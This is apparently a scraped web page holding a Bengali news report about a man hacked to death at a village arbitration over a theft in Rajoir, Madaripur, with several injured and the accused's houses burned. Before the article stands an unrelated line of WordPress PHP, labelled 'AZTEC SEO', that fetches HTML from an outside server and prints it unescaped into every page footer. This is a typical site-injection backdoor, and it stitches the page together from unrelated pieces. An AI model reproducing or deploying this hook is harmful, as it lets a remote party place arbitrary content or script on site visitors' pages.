/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
জামাইয়ের ভাইয়ের বসতঘরে চুরির ঘটনায় সালিশে ডেকে নিয়ে ফল ব্যবসায়ী শ্বশুরকে কুপিয়ে হত্যার অভিযোগ উঠেছে প্রতিপক্ষের লোকজনের বিরুদ্ধে। এ ঘটনায় জামাইসহ আহত হয় অন্তত ৫ জন।
মঙ্গলবার সকালে মাদারীপুরের রাজৈর উপজেলার আমগ্রাম ইউনিয়নের মধ্যপাড়া এলাকায় এ ঘটনা ঘটে। ঘটনার পর অভিযুক্তদের বসতঘরে আগুন দিয়েছে বিক্ষুব্ধরা। এলাকা ছেড়ে পালিয়েছে অভিযুক্তরা।
নিহত জাকির রাজৈর উপজেলার মজুমদারকান্দি গ্রামের নুর জামান শেখের ছেলে। তিনি রাজৈর বাসস্ট্যান্ড এলাকায় ফলের ব্যবসা করতেন।
জানা যায়, মাদারীপুরের রাজৈর উপজেলার আমগ্রাম ইউনিয়নের মধ্যপাড়া এলাকার রাসেল বেপারীর ভাই সোহেল বেপারীর বসতঘরে সম্প্রতি চুরি হয়। এ ঘটনায় থানায় লিখিত দেন ভুক্তভোগী। মঙ্গলবার সকালে একই এলাকার মজিদ খানের পরিবারের সঙ্গে সালিশ-বৈঠকের আয়োজন করেন এলাকার মাতবররা। সেখানে পরিকল্পিতভাবে রাসেলকে কুপিয়ে আহত করা হয়। বাধা দেওয়ায় নারীসহ ৪ জনকে কুপিয়ে ও পিটিয়ে আহত করে প্রতিপক্ষ।
পরে ফের সালিশের কথা বলে রাসেলের শ্বশুর জাকির শেখকে খবর দিয়ে জামাইয়ের বাড়িতে আনা হয়। জাকির শেখ ঘটনাস্থলে গেলে তাকেও কুপিয়ে জখম করে মজিদ খান ও তার ছেলেসহ সমর্থকরা। আহতদের উদ্ধার করে রাজৈর উপজেলা স্বাস্থ্য কমপ্লেক্সে নেওয়া হলে জাকিরকে মৃত ঘোষণা করেন কর্তব্যরত ডা. আল ইয়াসা।
ঘটনার পর অভিযুক্তদের ৪টি বসতঘরে আগুন ধরিয়ে দেয় বিক্ষুব্ধরা। খবর পেয়ে ঘটনাস্থলে গিয়ে পরিস্থিতি নিয়ন্ত্রণে আনে পুলিশ ও ফায়ার সার্ভিস। এলাকায় থমথমে অবস্থা বিরাজ করায় মোতায়েন করা হয়েছে অতিরিক্ত পুলিশ।
আহত রাসেল বেপারী বলেন, পরিকল্পিতভাবে আমার শ্বশুরকে কুপিয়ে হত্যা করা হয়েছে। আমি এ ঘটনার বিচার চাই। সামান্য চুরি নিয়ে হত্যাকাণ্ডের মতো ঘটনা হবে, সেটা বুঝতে পারিনি।
রাজৈর থানার পরিদর্শক (তদন্ত) মো. কুতুব উদ্দিন বলেন, এলাকার জমিজমা নিয়ে বিরোধ ও চুরির ঘটনাকে কেন্দ্র করে এই হত্যাকাণ্ডের ঘটনা ঘটে। দোষীকে ধরতে এরইমধ্যে পুলিশ কাজ করছে। এছাড়া এলাকার শান্তিশৃঙ্খলা রাখতে অতিরিক্ত পুলিশ মোতায়েন করা হয়েছে।